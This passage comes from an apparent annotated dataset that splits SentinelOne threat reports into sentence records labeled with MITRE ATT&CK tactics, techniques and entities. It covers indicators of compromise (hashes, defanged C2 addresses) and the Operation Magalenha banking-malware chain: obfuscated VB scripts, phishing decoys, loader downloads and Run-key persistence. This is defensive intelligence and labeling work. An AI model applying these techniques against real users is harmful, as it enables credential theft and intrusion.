"sentinel-62_SentinelOne_report-p1-s132-34baf7", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 132, "context_before": "These centralized entities provide continuity and adaptability to cyberespionage operations, equipping threat actors with consistently updated tools and evolving tactics as they target new victims.", "sentence_text": "Indicators of Compromise SHA1 Hashes IP Addresses Domains China Share Aleksandar Milenkoski Aleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s133-cbacfb", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 133, "context_before": "Indicators of Compromise SHA1 Hashes IP Addresses Domains China Share Aleksandar Milenkoski Aleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs.", "sentence_text": "With expertise in malware research and focus on targeted attacks, he brings a blend of practical and deep insights to the forefront of cyber threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s134-0b5db7", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 134, "context_before": "With expertise in malware research and focus on targeted attacks, he brings a blend of practical and deep insights to the forefront of cyber threat intelligence.", "sentence_text": "Aleksandar has a PhD in system security and is the author of numerous reports on cyberespionage and high-impact cybercriminal operations, conference talks, and peer-reviewed research papers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s135-b431f5", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 135, "context_before": "Aleksandar has a PhD in system security and is the author of numerous reports on cyberespionage and high-impact cybercriminal operations, conference talks, and peer-reviewed research papers.", "sentence_text": "From 2011 to 2014, he was a European Commission Marie Skłodowska-Curie Research Fellow.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s136-ef7a43", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 136, "context_before": "From 2011 to 2014, he was a European Commission Marie Skłodowska-Curie Research Fellow.", "sentence_text": "Prev\nLABScon24 Replay | PKfail: Supply-Chain Failures in Secure Boot Key Management Next LABScon24", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s137-1bd644", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 137, "context_before": "Prev\nLABScon24 Replay | PKfail: Supply-Chain Failures in Secure Boot Key Management Next LABScon24", "sentence_text": "2025 China’s Covert Capabilities | Silk Spun From Hafnium July 30 2025 macOS NimDoor | DPRK Threat Actors Target Web3 and Crypto Platforms with Nim-Based Malware July 02 2025 [FILTERED_TABLES_START]\nDigital Eye | bK2o.exe", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s138-120888", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 138, "context_before": "2025 China’s Covert Capabilities | Silk Spun From Hafnium July 30 2025 macOS NimDoor | DPRK Threat Actors Target Web3 and Crypto Platforms with Nim-Based Malware July 02 2025 [FILTERED_TABLES_START]\nDigital Eye | bK2o.exe", "sentence_text": "| Thu May 30 08:47:56 2024 Tainted Love | mim221 (pc.exe) | Thu Jun 09 08:02:12 2022 Tainted Love | mim221 (AddSecurityPackage64.dll) | Thu Jun 09 08:01:46 2022 Tainted Love | mim221 (pc.dll) | Tue Jun 07 16:55:05 2022 Tainted Love | mim221 (getHashFlsa64.dll)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s139-b417de", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 139, "context_before": "| Thu May 30 08:47:56 2024 Tainted Love | mim221 (pc.exe) | Thu Jun 09 08:02:12 2022 Tainted Love | mim221 (AddSecurityPackage64.dll) | Thu Jun 09 08:01:46 2022 Tainted Love | mim221 (pc.dll) | Tue Jun 07 16:55:05 2022 Tainted Love | mim221 (getHashFlsa64.dll)", "sentence_text": "| Fri May 27 20:56:26 2022 0be9dd709d7d68887a92c793881dd4a010796e95 | The CreateDump tool (do.exe)\n213f06ed5ac9e688816b4bbe73bf507994949964", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s141-141213", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 141, "context_before": "|", "sentence_text": "The GetUserInfo tool 289f3bfe297923507cf4c26ca500ae01819c6a95 | The local.exe tool 2e2cf8a4a0e7decceb8e22536b13173479da0d13 | PHPsert variant 3035d8846d7a9f309f2d24daba6ac33ad99524fc |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s142-eb31b0", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 142, "context_before": "The GetUserInfo tool 289f3bfe297923507cf4c26ca500ae01819c6a95 | The local.exe tool 2e2cf8a4a0e7decceb8e22536b13173479da0d13 | PHPsert variant 3035d8846d7a9f309f2d24daba6ac33ad99524fc |", "sentence_text": "PHPsert variant 399776991a094e1ee78b2a915bf4491e67c04ec7 | PHPsert variant 3a688c844259822c51ceb3aea508303c4a654eb3 | PHPsert variant 4d6947a19dd9a420c22fee39fac8b4df95a47569 | PHPsert variant 63cea28d927f8e629377399fa08a9cb4fd0c6238 | PHPsert variant 6549e50645bb1c02e4972651d335a75cb6d5aa74 | PHPsert variant 7941909fd5c1277c6f7baf21e484c9e59ea454ee | mimCN (bK2o.exe)\n7cb7bcb9187f8faf47fd77cf1213ab3fe2350a77 | mimCN (simplify_32.exe)\n82b1cb9b69d5f05bb20852322fb3c2c00bce9134 | mimCN (wsx.exe)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s143-520db5", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 143, "context_before": "PHPsert variant 399776991a094e1ee78b2a915bf4491e67c04ec7 | PHPsert variant 3a688c844259822c51ceb3aea508303c4a654eb3 | PHPsert variant 4d6947a19dd9a420c22fee39fac8b4df95a47569 | PHPsert variant 63cea28d927f8e629377399fa08a9cb4fd0c6238 | PHPsert variant 6549e50645bb1c02e4972651d335a75cb6d5aa74 | PHPsert variant 7941909fd5c1277c6f7baf21e484c9e59ea454ee | mimCN (bK2o.exe)\n7cb7bcb9187f8faf47fd77cf1213ab3fe2350a77 | mimCN (simplify_32.exe)\n82b1cb9b69d5f05bb20852322fb3c2c00bce9134 | mimCN (wsx.exe)", "sentence_text": "83ca53c95705352ff60149b0b17a686956e23172 | PHPsert variant a9d6d0c47728094feb794ad7e25c253737633140 | Visual Studio Code (code.exe)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s144-dc8045", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 144, "context_before": "83ca53c95705352ff60149b0b17a686956e23172 | PHPsert variant a9d6d0c47728094feb794ad7e25c253737633140 | Visual Studio Code (code.exe)", "sentence_text": "b2811cb4d0afe13d2722093039a72588c348dcfd | PHPsert variant c0e03fce8f7f51e91da79f773aa870f0897b0ee2 | PHPsert variant cb6726fb3f7952ede04ed22d2c72389255991827 | PHPsert variant d57fa43944676c56e66f4b20ffa3d82048e354fd | PHPsert variant e572380ab95c4ab5a87f701d4654d3386911b387 | do.bat e8a8d8fa7122c1592a314343b45bac2c213bb57d | mimCN (wsx1.exe)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s145-f0093e", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 145, "context_before": "b2811cb4d0afe13d2722093039a72588c348dcfd | PHPsert variant c0e03fce8f7f51e91da79f773aa870f0897b0ee2 | PHPsert variant cb6726fb3f7952ede04ed22d2c72389255991827 | PHPsert variant d57fa43944676c56e66f4b20ffa3d82048e354fd | PHPsert variant e572380ab95c4ab5a87f701d4654d3386911b387 | do.bat e8a8d8fa7122c1592a314343b45bac2c213bb57d | mimCN (wsx1.exe)", "sentence_text": "146.70.161[.]78 | Server used for initial access (SQL injection attack)\n185.76.78[.]117 | C2 server (PHPsert webshells)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s146-76ffae", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 146, "context_before": "146.70.161[.]78 | Server used for initial access (SQL injection attack)\n185.76.78[.]117 | C2 server (PHPsert webshells)", "sentence_text": "4.232.170[.]137 | C2 server (SSH access)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s147-14cfbc", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 147, "context_before": "4.232.170[.]137 | C2 server (SSH access)", "sentence_text": "[REDACTED].euw.devtunnels[.]ms | Visual Studio Code dev tunnel", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s1-365bba", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "By Aleksandar Milenkoski and Tom Hegel Executive Summary Over the first quarter of 2023, SentinelLABS observed a campaign targeting users of Portuguese financial institutions conducted by a Brazilian threat group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s2-9bf869", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "By Aleksandar Milenkoski and Tom Hegel Executive Summary Over the first quarter of 2023, SentinelLABS observed a campaign targeting users of Portuguese financial institutions conducted by a Brazilian threat group.", "sentence_text": "The campaign is the latest iteration of a broader activity nexus dating back to 2021, now targeting the users of over 30 financial institutions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s3-3bd5b5", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "The campaign is the latest iteration of a broader activity nexus dating back to 2021, now targeting the users of over 30 financial institutions.", "sentence_text": "The attackers can steal credentials and exfiltrate users’ data and personal information, which can be leveraged for malicious activities beyond financial gain.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" }, { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "steal credentials and exfiltrate users’ data", "entities": [ { "text": "The attackers", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "steal credentials", "start": 18, "end": 35, "label": "Action" }, { "text": "exfiltrate users’ data and personal information", "start": 40, "end": 87, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s4-390ed5", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "The attackers can steal credentials and exfiltrate users’ data and personal information, which can be leveraged for malicious activities beyond financial gain.", "sentence_text": "The threat group simultaneously deploys two backdoor variants to maximize attack potency.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "The threat group deploys two backdoor variants to increase attack effectiveness.", "entities": [ { "text": "The threat group", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "deploys two backdoor variants", "start": 32, "end": 61, "label": "Action" }, { "text": "two backdoor variants", "start": 40, "end": 61, "label": "MalwareTool" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s5-26aaf9", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "The threat group simultaneously deploys two backdoor variants to maximize attack potency.", "sentence_text": "Based on similarities in TTPs as well as overlaps in malware implementation and functionalities reported in previous work, we assess with high confidence that the campaign has been conducted by a Brazilian threat group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s6-2885e4", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "Based on similarities in TTPs as well as overlaps in malware implementation and functionalities reported in previous work, we assess with high confidence that the campaign has been conducted by a Brazilian threat group.", "sentence_text": "This conclusion is further supported by the presence of Brazilian-Portuguese language usage within the infrastructure configurations and malware implementations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s7-774b3a", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "This conclusion is further supported by the presence of Brazilian-Portuguese language usage within the infrastructure configurations and malware implementations.", "sentence_text": "We refer to the campaign conducted by this threat group as Operation Magalenha.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s8-9c12c4", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "We refer to the campaign conducted by this threat group as Operation Magalenha.", "sentence_text": "The threat actor deploys two backdoor variants on each infected machine, which we collectively dubbed PeepingTitle.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "The threat actor deploys two backdoor variants on each infected machine.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "deploys two backdoor variants on each infected machine", "start": 17, "end": 71, "label": "Action" }, { "text": "two backdoor variants", "start": 25, "end": 46, "label": "MalwareTool" }, { "text": "infected machine", "start": 55, "end": 71, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s9-dbe1b1", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "The threat actor deploys two backdoor variants on each infected machine, which we collectively dubbed PeepingTitle.", "sentence_text": "We therefore assess that Operation Magalenha is the latest iteration of a long-standing activity nexus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s10-8c4472", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "We therefore assess that Operation Magalenha is the latest iteration of a long-standing activity nexus.", "sentence_text": "Operation Magalenha is characterized by changes in infrastructure design, and malware implementation and deployment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s11-18c9de", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "Operation Magalenha is characterized by changes in infrastructure design, and malware implementation and deployment.", "sentence_text": "The threat actor behind the operation deploys two PeepingTitle variants simultaneously on infected machines, aiming to maximize the potency of their attacks.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "The threat actor deploys two PeepingTitle variants simultaneously on infected machines.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "deploys two PeepingTitle variants simultaneously on infected machines", "start": 38, "end": 107, "label": "Action" }, { "text": "two PeepingTitle variants", "start": 46, "end": 71, "label": "MalwareTool" }, { "text": "infected machines", "start": 90, "end": 107, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s12-31d923", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "The threat actor behind the operation deploys two PeepingTitle variants simultaneously on infected machines, aiming to maximize the potency of their attacks.", "sentence_text": "Many of the TTPs we observed relate to those discussed in previous research attributing them to Brazilian threat actors that target users not only in Portugal but also in Spain as well as Central and Latin American countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s13-1f704c", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "Many of the TTPs we observed relate to those discussed in previous research attributing them to Brazilian threat actors that target users not only in Portugal but also in Spain as well as Central and Latin American countries.", "sentence_text": "This opens up further possibilities for the targeting of individuals or organizations, or for the exploitation of that information and data by other cybercriminal or espionage groups.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s14-75697d", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "This opens up further possibilities for the targeting of individuals or organizations, or for the exploitation of that information and data by other cybercriminal or espionage groups.", "sentence_text": "Infection Vector\nBrazilian threat actors are known to distribute malware using a variety of methods, such as phishing websites delivering fake installers of popular applications.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "distribute malware via phishing websites delivering fake installers", "entities": [ { "text": "Brazilian threat actors", "start": 17, "end": 40, "label": "ThreatActor" }, { "text": " fake installers of popular applications.", "start": 137, "end": 178, "label": "MalwareTool" }, { "text": "phishing websites", "start": 109, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "distribute malware ", "start": 54, "end": 73, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s15-ab1853", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "Infection Vector\nBrazilian threat actors are known to distribute malware using a variety of methods, such as phishing websites delivering fake installers of popular applications.", "sentence_text": "The malware loader subsequently downloads and executes the PeepingTitle backdoors.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "downloads and executes the PeepingTitle backdoors", "entities": [ { "text": "malware loader", "start": 4, "end": 18, "label": "MalwareTool" }, { "text": "PeepingTitle backdoors.", "start": 59, "end": 82, "label": "MalwareTool" }, { "text": "downloads and executes", "start": 32, "end": 54, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s16-18b964", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "The malware loader subsequently downloads and executes the PeepingTitle backdoors.", "sentence_text": "The VB scripts are obfuscated such that the malicious code is scattered among large quantities of code comments, which is typically pasted content of publicly available code repositories.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s17-e39686", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "The VB scripts are obfuscated such that the malicious code is scattered among large quantities of code comments, which is typically pasted content of publicly available code repositories.", "sentence_text": "This is a simple, yet effective technique for evading static detection mechanisms – the scripts that are available on VirusTotal feature relatively low detection ratios.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "VB scripts use obfuscation to evade static detection mechanisms.", "entities": [ { "text": "evading static detection mechanisms", "start": 46, "end": 81, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s18-edaf8f", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "This is a simple, yet effective technique for evading static detection mechanisms – the scripts that are available on VirusTotal feature relatively low detection ratios.", "sentence_text": "When executed, the VB scripts first open a TinyURL to user login sites of Energias de Portugal (EDP) and the Portuguese Tax and Customs Authority (AT – Autoridade Tributária e Aduaneira).", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "open a TinyURL to user login sites", "entities": [ { "text": "the VB scripts", "start": 15, "end": 29, "label": "MalwareTool" }, { "text": "a TinyURL", "start": 41, "end": 50, "label": "Infrastructure_Indicator" }, { "text": "open a TinyURL to user login sites", "start": 36, "end": 70, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s19-b00595", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "When executed, the VB scripts first open a TinyURL to user login sites of Energias de Portugal (EDP) and the Portuguese Tax and Customs Authority (AT – Autoridade Tributária e Aduaneira).", "sentence_text": "Based on this script behavior, we suspect that the threat group behind Operation Magalenha has been delivering the scripts through EDP- and AT-themed phishing emails, aligning with a known tactic observed among threat actors targeting Portuguese citizens.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "delivering the scripts through EDP- and AT-themed phishing emails", "entities": [ { "text": "the threat group behind Operation Magalenha", "start": 47, "end": 90, "label": "ThreatActor" }, { "text": "the scripts", "start": 111, "end": 122, "label": "MalwareTool" }, { "text": "delivering the scripts through EDP- and AT-themed phishing emails", "start": 100, "end": 165, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s20-843ead", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "Based on this script behavior, we suspect that the threat group behind Operation Magalenha has been delivering the scripts through EDP- and AT-themed phishing emails, aligning with a known tactic observed among threat actors targeting Portuguese citizens.", "sentence_text": "The VB scripts serve a twofold purpose for the threat actors:\nAct as a smoke screen distracting users while the scripts continue to download and execute the malware loader.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "VB scripts act as a smoke screen while downloading and executing the malware loader", "entities": [ { "text": "the threat actors:", "start": 43, "end": 61, "label": "ThreatActor" }, { "text": "VB scripts", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "the malware loader.", "start": 153, "end": 172, "label": "MalwareTool" }, { "text": "Act as a smoke screen distracting users", "start": 62, "end": 101, "label": "Action" }, { "text": "download and execute the malware loader.", "start": 132, "end": 172, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s21-46f867", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "The VB scripts serve a twofold purpose for the threat actors:\nAct as a smoke screen distracting users while the scripts continue to download and execute the malware loader.", "sentence_text": "Enable the theft of EDP and AT credentials if the users enter the credentials after the malware loader has executed the PeepingTitle backdoors.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1556", "name": "Modify Authentication Process" } ], "procedure": "enable the theft of EDP and AT credentials after executing the PeepingTitle backdoors", "entities": [ { "text": " malware loader", "start": 87, "end": 102, "label": "MalwareTool" }, { "text": "PeepingTitle backdoors.", "start": 120, "end": 143, "label": "MalwareTool" }, { "text": "Enable the theft of EDP and AT credentials", "start": 0, "end": 42, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s22-ed88a5", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "Enable the theft of EDP and AT credentials if the users enter the credentials after the malware loader has executed the PeepingTitle backdoors.", "sentence_text": "This may provide the threat actor with users’ personal information.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1056", "name": "Input Capture" } ], "procedure": "provide the threat actor with users’ personal information", "entities": [ { "text": "the threat actor", "start": 17, "end": 33, "label": "ThreatActor" }, { "text": "provide the threat actor with users’ personal information.", "start": 9, "end": 67, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s23-59e61e", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "This may provide the threat actor with users’ personal information.", "sentence_text": "The scripts then download to the %PUBLIC% folder an archive file that contains a malware loader.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "download to the %PUBLIC% folder an archive file that contains a malware loader", "entities": [ { "text": "malware loader.", "start": 81, "end": 96, "label": "MalwareTool" }, { "text": "%PUBLIC% folder", "start": 33, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "download to the %PUBLIC% folder an archive file that contains a malware loader.", "start": 17, "end": 96, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s24-d97d6a", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "The scripts then download to the %PUBLIC% folder an archive file that contains a malware loader.", "sentence_text": "They subsequently extract the loader and delete the archive.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "extract the loader and delete the archive", "entities": [ { "text": " the loader", "start": 25, "end": 36, "label": "MalwareTool" }, { "text": "extract the loader and delete the archive.", "start": 18, "end": 60, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s25-9279cb", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "They subsequently extract the loader and delete the archive.", "sentence_text": "The malware loader downloads and executes two PeepingTitle backdoor variants.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "The malware loader downloads and executes two PeepingTitle backdoor variants.", "entities": [ { "text": "malware loader", "start": 4, "end": 18, "label": "MalwareTool" }, { "text": "downloads and executes two PeepingTitle backdoor variants", "start": 19, "end": 76, "label": "Action" }, { "text": "two PeepingTitle backdoor variants", "start": 42, "end": 76, "label": "MalwareTool" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s26-1b7487", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "The malware loader downloads and executes two PeepingTitle backdoor variants.", "sentence_text": "PeepingTitle\nThe PeepingTitle sample pairs we analyzed are Delphi executables and have compilation timestamps in April 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s27-a5d659", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "PeepingTitle\nThe PeepingTitle sample pairs we analyzed are Delphi executables and have compilation timestamps in April 2023.", "sentence_text": "The samples share some code segments indicating that they have been developed as part of a single development effort.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s28-0cd51f", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "The samples share some code segments indicating that they have been developed as part of a single development effort.", "sentence_text": "For example, both malware strains implement similar initialization routines, which involve evaluating the presence of the wine_get_version function in the ntdll.dll library file and establishing persistence by editing the HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Malware initialization and persistence", "entities": [ { "text": " both malware strains", "start": 12, "end": 33, "label": "MalwareTool" }, { "text": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key", "start": 222, "end": 298, "label": "Infrastructure_Indicator" }, { "text": "implement similar initialization routines", "start": 34, "end": 75, "label": "Action" }, { "text": "establishing persistence", "start": 182, "end": 206, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s29-2c919d", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "For example, both malware strains implement similar initialization routines, which involve evaluating the presence of the wine_get_version function in the ntdll.dll library file and establishing persistence by editing the HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key.", "sentence_text": "Similar to other malware used by Brazilian threat actors, the PeepingTitle backdoors contain string artifacts in Brazilian-Portuguese language.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-63_SentinelOne_report-p1-s30-10b4b0", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "Similar to other malware used by Brazilian threat actors, the PeepingTitle backdoors contain string artifacts in Brazilian-Portuguese language.", "sentence_text": "After initialization, at one second intervals the first PeepingTitle variant monitors the titles of application windows that have captured the mouse cursor.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Monitors application window titles capturing the mouse cursor", "entities": [ { "text": "first PeepingTitle variant", "start": 50, "end": 76, "label": "MalwareTool" }, { "text": "monitors the titles of application windows that have captured the mouse cursor.", "start": 77, "end": 156, "label": "Action" } ] }, { "uid": "sentinel-63_SentinelOne_report-p1-s31-f91778", "source": "sentinel", "doc_id": "63_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "After initialization, at one second intervals the first 